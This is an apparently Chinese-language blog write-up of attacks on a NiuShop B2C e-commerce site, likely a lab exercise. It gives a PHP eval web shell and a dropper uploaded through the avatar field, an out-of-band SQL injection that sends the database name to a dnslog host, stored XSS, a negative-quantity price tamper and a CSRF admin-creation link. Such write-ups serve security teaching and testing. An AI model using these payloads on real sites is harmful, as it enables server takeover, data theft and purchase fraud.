文件上传漏洞
先注册一个账号
![](https://i-blog.csdnimg.cn/direct/5e16e25729e849169db11b52d271d4cc.png)
来到个人信息修改个人头像
![](https://i-blog.csdnimg.cn/direct/a5c62eb9736f406f99df3e961c8699aa.png)
选择我们的马
#一句话(不想麻烦的选择一句话也可以)
<?php @eval($_POST["cmd"]);?>
#生成h.php文件
<?php
fputs(fopen('h.php','w'),'<?php @eval($_POST["cmd"]);?>');
?>
在BP中进行抓包,改为1.php
![](https://i-blog.csdnimg.cn/direct/6f13abcae34a4362b94b5e23fe096429.png)
右键图片在网页新建打开图片标签;就能获取路径
![](https://i-blog.csdnimg.cn/direct/566e65ee54d34384b46e95a474502465.png)
去蚁剑连接生成的h.php就行
![](https://i-blog.csdnimg.cn/direct/acdba3cf16654c619cbe5dadb776b4db.png)
SQL注入漏洞
我们查看后台寻找功能点发现有一个地方可以执行 sql 命令
![](https://i-blog.csdnimg.cn/direct/efe8b773122b464a894109c3fddb6190.png)
我们输入一个 sql 语句
![](https://i-blog.csdnimg.cn/direct/db195076ec3c4af19538c55c4d85be28.png)
发现没有回显,这时我们可以考虑使用外带注入
(select load_file(concat('\\\\',(select (database())),'96toab.dnslog.cn.dnslog.cn\\abc')))
![](https://i-blog.csdnimg.cn/direct/dec204054eb04ffc882efc2ed9792a48.png)
![](https://i-blog.csdnimg.cn/direct/78c5343714654a209883932cd2e4d860.png)
得到数据库的名字为 niushop_b2c
获取表名
XSS漏洞
后台-->设置-->基础设置-->商城第三方统计代码
![](https://i-blog.csdnimg.cn/direct/9984424841e041a794dc9506a8968412.png)
来到首页就会弹窗
![](https://i-blog.csdnimg.cn/direct/749f23f8841e4980ac7376e529ede98a.png)
0元购
在商品页面抓包
![](https://i-blog.csdnimg.cn/direct/aaaeda99aa864b3694c1a11ef8213ea8.png)
通过改变数量改变价格
![](https://i-blog.csdnimg.cn/direct/d54544366fa5407db26194c02a475bb4.png)
在放行一次修改数量为-1
![](https://i-blog.csdnimg.cn/direct/5c1c6c5d9a9541fdbaf8655f4c916218.png)
后面全部放行就OK了
![](https://i-blog.csdnimg.cn/direct/6ccab41d865343d59d4a97c0415126e3.png)
CSRF漏洞
下载源码;制作添加管理员链接
添加管理员用户
![](https://i-blog.csdnimg.cn/direct/db7552992a714485a78c7068faada09f.png)
BP抓包;制作SCRF
![](https://i-blog.csdnimg.cn/direct/d8425edeaa164edab22951f9dd312fbd.png)
复制下来制作链接
![](https://i-blog.csdnimg.cn/direct/b41a428ca6f14fe9b62cc24e447f2247.png)
admin管理员在已登录的状态点击我们的链接
![](https://i-blog.csdnimg.cn/direct/225e0c2c0f65456a89e731b984a4c161.png)
![](https://i-blog.csdnimg.cn/direct/528e5d0e4ae0485bb09c82943c14d880.png)